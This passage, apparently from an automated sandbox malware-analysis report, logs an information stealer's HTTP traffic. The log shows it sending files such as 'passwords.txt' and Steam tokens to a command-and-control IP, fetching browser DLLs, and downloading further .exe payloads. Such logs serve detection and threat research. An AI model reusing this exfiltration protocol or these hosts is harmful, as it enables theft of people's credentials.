name="file_name"cGFzc3dvcmRzLnR4dA==------BGIJJKKJJDAAAAAKFHJJContent-Disposition: form-data; name="file_data"------BGIJJKKJJDAAAAAKFHJJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="file_data"------GHJKJDAKEHJDGDGDGHID--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHDHost: 147.45.68.138Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"3------GHJKJDAKEHJDGDGDGHID--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJJECFIEBFHIEGHJDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="mode"4------KJKJJJECFIEBFHIEGHJD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEBHost: 147.45.68.138Content-Length: 457Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 2b 64 41 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_data"N+dA------AKJKFBAFIDAEBFHJKJEB--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 147.45.68.138Content-Length: 115113Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="mode"5------CFIECBFIDGDAKFHIEHJK--
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd8fb6f7b_lgjfd.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 33 35 34 34 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="mode"51------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="task_id"1035440------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="status"1------HIEBAKEHDHCAKEBFBKEG--
Source: global traffic	HTTP traffic detected: GET /prog/66d0cd9a65b5d_vqwergf.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHDHost: 147.45.68.138Content-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 30 33 35 34 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 2d 2d 0d 0a Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="mode"51------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="task_id"1035441------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="status"1------JDGCGDBGCAAEBFIECGHD--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCAHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"6------DHIEBAAKJDHIECAAFHCA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFCAAAAFBAKEBFBAKKHost: stadiatechnologies.comContent-Length: 5777Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 34 35 37 31 39 37 39 41 44 45 32 33 39 32 34 36 39 36 33 33 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 2d 2d 0d 0a Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="hwid"C4571979ADE23924696330-a33c7340-61ca------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------DAKJDHIEBFIIDGDGDBAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="mode"1------CFHDBFIEGIDGIECBKJEC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJKFBGIIJJKFIJDBGHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 4b 46 42 47 49 49 4a 4a 4b 46 49 4a 44 42 47 2d 2d 0d 0a Data Ascii: ------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="token"24ebb61fa2561269400e7def790dee73------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="build_id"1f3c236c672ff2ffe017b396f834c66e------IIDHJKFBGIIJJKFIJDBGContent-Disposition: form-data; name="mode"2------IIDHJKFBGIIJJKFIJDBG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 65 62 62 36 31 66 61 32 35 36 31 32 36 39 34 30 30 65 37 64 65 66 37 39 30 64 65 65 37 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 33 63 32 33 36 63 36 37 32 66 66 32 66 66 65 30 31 37 62 33 39 36 66 38 33 34 63 36 36 65 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 